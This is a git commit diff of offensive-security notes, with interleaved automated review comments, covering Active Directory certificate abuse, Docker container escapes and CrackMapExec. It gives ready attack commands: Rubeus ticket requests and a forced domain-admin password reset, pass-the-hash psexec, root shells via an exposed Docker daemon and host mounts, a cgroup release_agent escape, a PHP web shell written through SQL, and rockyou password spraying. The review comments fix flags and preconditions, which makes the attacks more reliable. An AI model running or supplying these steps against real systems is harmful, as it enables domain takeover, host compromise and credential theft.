AD certificate and docker escapes
This commit is contained in:
parent
74845509af
commit
bbef002f0a
@ -28,6 +28,14 @@ Exploitable templates should have the following traits:
* Find groups by `net user <username> /domain` --> `Domain Users`, `Domain Computers`
* Client authentication EKU for Kerberos authentication --> `Client Authentication`
* Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, --> `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`

#### Certify

Find information about all registered CAs. For a start take a look at least at
```sh
Certify.exe find /vulnerable
```


### Certificate Creation

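Review bot: the third trait bullet misdescribes `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`, and "e.g. URL to encrypt" does not belong there. The flag means the requester writes the subject, including the SAN, into the CSR, which is what lets a low-privileged enrollee request a certificate carrying another account's UPN and then use it for Kerberos (ESC1). Suggest `* Enrollee supplies the subject/SAN in the request --> `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT``. The list should also name the two conditions `Certify.exe find /vulnerable` checks alongside these: the group found via `net user <username> /domain` has enrollment rights on the template, and the template requires neither manager approval nor authorized signatures. Wording: "For a start take a look at least at" reads badly; "Start with" is enough.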
@ -36,18 +44,25 @@ Exploitable templates should have the following traits:
* After that in the main menu, `Personal` --> `Certificates` --> __The certificate__
* Right click certificate --> `All Tasks` --> `Export` --> `Yes, export private key` --> `PFX` --> set `Password` --> Save

* An alternative is certipy-ad
An alternative is certipy-ad

#### Certipy-AD

First `pip install certipy-ad`
Take a look at the Documentation provided in the [git repositories'
README](https://github.com/ly4k/Certipy?source=post_page-----c56f238991c0--------------------------------#esc7).
Since it is possible to create certifcates of (Sub)CAs if you do have the right permissions on CA directly, it is worth a check.
[Hacktricks' AD CS Domain Escalation](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation) provides the details.

### Impersonation

* Request TGT with the created cert
* Grab TGT
Request TGT with the created cert.

* On the machine via
#### On the target machine via
```sh
Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to.kirbi> /domain:<domain name> /dc:<IP of domain controller>
```
* Select a domain admin via opening `Active Directory Users and Computers`
Select a domain admin via opening `Active Directory Users and Computers`
```sh
.\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain of controller> /targetuser:<domain>\<dauser>
```
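Review bot: `/dc:<domain of controller>` in the `changepw` line is the wrong placeholder; Rubeus wants a domain controller hostname or IP there, the same value the `asktgt` line passes as `/dc:<IP of domain controller>`. The step should also say what it does: `changepw` resets the chosen domain admin's password over kpasswd, which is destructive and loud, and it only succeeds if the account the certificate was issued for has reset-password rights on that target; requesting the TGT with `/ptt` and using it directly is the quieter route. Minor: drop the Medium tracking query `?source=post_page-----c56f238991c0--------------------------------` from the Certipy README link (keep `#esc7`), and "certifcates" should be "certificates".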
@ -61,6 +76,13 @@ exit
dir \\<domain>\<dir>$\
```

#### On the attacking machine

Use impacket's psexec
```sh
psexec.py $DOMAIN/administrator@$DOMAIN -hashes $found_hash -dc-ip $DC_IP
```

## CVE-2022-26923

* Aims on abusing templates configuration, the Subject Alternative Name `SAN`. Set it to someone with higher permissions
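Review bot: the `## CVE-2022-26923` bullet describes ESC1 (an enrollee-controlled SAN naming a privileged account), not this CVE. CVE-2022-26923 (Certifried) goes through the `Machine` template: an attacker who can create or control a computer account sets its `dNSHostName` to a domain controller's name, enrolls, and the issued certificate authenticates as the DC's machine account; the template's SAN flag plays no part. Rewrite the bullet around `dNSHostName` and the `Machine` template. In the psexec line, `administrator@$DOMAIN` relies on the domain name resolving to a DC; name the host explicitly, e.g. `$DOMAIN/administrator@$DC_IP`, and note that `-hashes` takes `LMHASH:NTHASH`, so `$found_hash` must carry the leading `:` when only the NT hash is known.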
@ -54,45 +54,39 @@ curl http://example.com:5000/v2/<REPOSITORY>/tags/list
curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG>
```

## Reversing Docker Images
## Remote Docker Daemon

* [Dive](https://github.com/wagoodman/dive)
Users inside the `docker` group may open tcp socket through docker
In case you find an exposed docker daemon it can be used in the following way

```sh
dive <IMAGE-ID>
docker -H tcp://$TARGET_IP:2375 ps
docker -H tcp://$TARGET_IP:2375 images
docker -H tcp://test.com:2375 exec <container> <cmd>
docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh
```

## Uploading Images to Registry

* Ever image has a `latest` tag
* Upload modified docker image as `latest`
* [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining)

## RCE via Exposed Docker Daemon

* Users inside the `docker` group may open tcp socket through docker
* `nmap -sV -p- <IP> -vv` to find exposed tcp sockets via docker
* Confirming via `curl http://test.com:2375/version` on open docker port
* Execute commands on socket
Execute commands on socket

```sh
docker -H tcp://test.com:2375 ps
docker -H tcp://test.com:2375 exec <container> <cmd>
docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh
```

* [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease)

## Escape Container via Exposed Docker Daemon

* Looking for exposed docker sockets
Look out for exposed docker sockets

```sh
find / -name "*sock" 2>/dev/null
groups
```

* Mount the host volume and chroot to it, need alpine image.
Mount the host volume and chroot to it. Ideally, use an image that is
installed already, e.g. alpine here.

```sh
docker images
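Review bot: the registry request `/v2/<REPO>/<APP>/manifest/<TAG>` uses the wrong path segment; the Registry v2 API is `/v2/<name>/manifests/<reference>` (plural), so this line 404s as written. In the `## Remote Docker Daemon` block the host flips between `$TARGET_IP` and `test.com`, and the `exec` line needs `-it` for a shell; the same three `docker -H tcp://...:2375` commands appear again under `## RCE via Exposed Docker Daemon`, so if both sections survive this change, fold them. "Users inside the `docker` group may open tcp socket through docker" is unclear; the point worth stating is that tcp/2375 is unauthenticated and unencrypted, so anyone who can reach it controls the daemon, and the `run -it -v /:/mnt/host` line turns that into root on the host. Under `## Escape Container via Exposed Docker Daemon`, say what `find / -name "*sock"` is looking for (`/var/run/docker.sock` mounted into the container) and what `groups` is meant to show (membership in `docker`).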
@ -107,34 +101,27 @@ docker run -v /:/host --rm -it <imageID> chroot /host/ bash

## Shared Namespaces

* Namespaces
* Cgroups
* OverlayFS

* Requires root inside the container

* Execute command
Requires root inside the container

```sh
nsenter --target 1 --mount sh
nsenter --target 1 --mount --uts --ipc --net /bin/bash
```

## Misconfiguration

### capabilities
### Capabilities

* Privileged container connect to the host directly, not through the docker engine
* Execution of bins on the host from libs inside the container is possible
Privileged container connect to the host directly, not through the docker engine.
Execution of binaries on the host from inside the container is possible.

```sh
capsh --print
```

* `man capabilities`

* [PoC](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.)

* Exploit and get a reverse shell to the host via
Exploit and get a reverse shell to the host via

```sh
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
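Review bot: "Requires root inside the container" understates what `nsenter --target 1 --mount sh` needs. PID 1 is the host's init only when the container shares the host PID namespace (`--pid=host`), and `setns()` into another process's namespaces requires CAP_SYS_ADMIN, which a default Docker container lacks; in practice this is a `--privileged --pid=host` container. The same applies to the cgroup line below: `mount -t cgroup -o rdma cgroup /tmp/cgrp` needs CAP_SYS_ADMIN and a cgroup v1 `rdma` controller, so it fails on cgroup v2 (unified hierarchy) hosts; put that next to the `capsh --print` step, which is what tells you whether `cap_sys_admin` is present. "Privileged container connect to the host directly, not through the docker engine" is not accurate; what `--privileged` does is grant all capabilities, drop the seccomp and AppArmor profiles and expose host devices. Minor: strip the `#:~:text=...` text-fragment anchor from the PoC link.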
@ -147,7 +134,7 @@ chmod a+x /exploit
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```

* The file may appear outside the container on the host system
Caveat: The file may appear outside the container on some host systems. Have to investigate...

### cap_admin

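Review bot: `### cap_admin` is not a Linux capability; the release_agent technique above relies on CAP_SYS_ADMIN (it is the capability the linked Trail of Bits PoC is about), so the heading should read `### CAP_SYS_ADMIN`. On the caveat line: the output file ending up outside the container is the expected behaviour, not something to investigate. The release_agent is executed by the host kernel in the host's mount namespace, so whatever it writes lands on the host filesystem; the PoC makes the result visible inside the container only by writing to the container's overlay upperdir path (the `host_path` it derives from `/etc/mtab`), so if that path is wrong the file shows up on the host but not inside. Replace "Have to investigate..." with that explanation.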
@ -169,8 +156,8 @@ the docker volume, e.g.

## Check fdisk

* `fdisk -l` and `lsblk`, host bulk device may be exposed
* Mount the device
`fdisk -l` and `lsblk`, host bulk device may be exposed
Mount the device

```sh
mkdir /mnt/hostdev
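Review bot: "host bulk device" should be "host block device". Seeing a host partition in `fdisk -l` / `lsblk` output is not enough for the `mkdir /mnt/hostdev` step that follows: `mount` from inside needs CAP_SYS_ADMIN and the device node must be permitted by the container's device cgroup (`--privileged` or an explicit `--device`), so state that precondition here or move this section under `## Misconfiguration`.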
@ -218,6 +205,20 @@ Connection: Upgrade
Upgrade: tcp
```

## Reversing Docker Images

* [Dive](https://github.com/wagoodman/dive)

```sh
dive <IMAGE-ID>
```

## Uploading Images to Registry

* Ever image has a `latest` tag
* Upload modified docker image as `latest`
* [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining)

## Escape through DB

* Login into DB
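Review bot: "Ever image has a `latest` tag" is a typo ("Every") and also wrong: `latest` is just the tag Docker assumes when a push or pull names none, and an image only ever tagged `1.2` never gets one. The attack in the linked Trend Micro article works because clients that pull without a tag receive whatever is currently under `latest`, so the second bullet should say that pushing a modified image as `latest` (or over an existing tag) hijacks such pulls. Also "Login into DB" should be "Log in to the DB".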
@ -226,14 +227,14 @@ Upgrade: tcp
* Select table content into a file the user can read
* Execute the file

```sql
```SQL
create table h4x0r (pwn varchar(1024));
insert into h4x0r (pwn) values ('<?php $cmd=$_GET["cmd"];system($cmd);?>');
select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r INTO OUTFILE '/var/www/html/shell.php';
copy (select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r) to '/var/www/html/shell.php'; # In case of PostreSQL
```

* curl the webshell hon the exploited host
curl the webshell hon the exploited host

```sh
curl <host-IP>/shell.php?cmd=id
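Review bot: `# In case of PostreSQL` is not valid PostgreSQL syntax (`#` is not a comment there; use `--`) and the name is misspelled. The block also leaves out the preconditions: `INTO OUTFILE` needs the MySQL `FILE` privilege and `secure_file_priv` either empty or set to a directory containing `/var/www/html`, and `COPY ... TO '<file>'` needs superuser or `pg_write_server_files`; without those both statements fail. The `create table` / `insert` lines are unnecessary: `select '<?php ... ?>' into outfile '/var/www/html/shell.php';` writes the literal without a table. Typo: "hon" should be "on". The fence tag change from `sql` to `SQL` is cosmetic; the rest of the repo uses lower-case tags (`sh`), so keep `sql`.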
@ -1,23 +1,39 @@
# Crackmapexec

* Dictionary attack against SMB
```sh
cme smb domain.name -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
## Dictionary attack against SMB

```sh
cme <smb/mssql> <domain/IP> -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --continue-on-sucess --no-brute
```
* Use the password with `impacket/examples/psexec.py` in the following way

## Brute Force attack against SMB

Brute force attack using an anonymous user

```sh
cme smb <TARGET_IP> -u anonymous -p "" --rid-brute 10000
```

## Use Found Password

Use the password with `impacket/examples/psexec.py` in the following way

```sh
psexec.py domain.name/<user>:<password>@<target-IP>
```

## Shares
## Enumerate Shares

* Check user permissions on shares
``sh
Check user permissions on shares

```sh
crackmapexec smb 10.200.x.0/24 -u <user> -p <password> --shares
```

## SMB
* Check user hash on the network via smb

Check user hash on the network via smb

```sh
crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>
```
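Review bot: the `cme` dictionary line has a stray `s` between `-u <user>` and `-p`, and both long flags are misspelled: `--continue-on-sucess` should be `--continue-on-success`, and `--no-brute` should be `--no-bruteforce`. Note what that flag does: it pairs line N of the user file with line N of the password file instead of trying every combination, so with a single `<user>` it has no effect. `cme <smb/mssql>` is a protocol placeholder; write it as `cme smb ...` (or `mssql`). Running `rockyou.txt` against a domain account will trip the lockout threshold long before the list ends; this section should carry that warning.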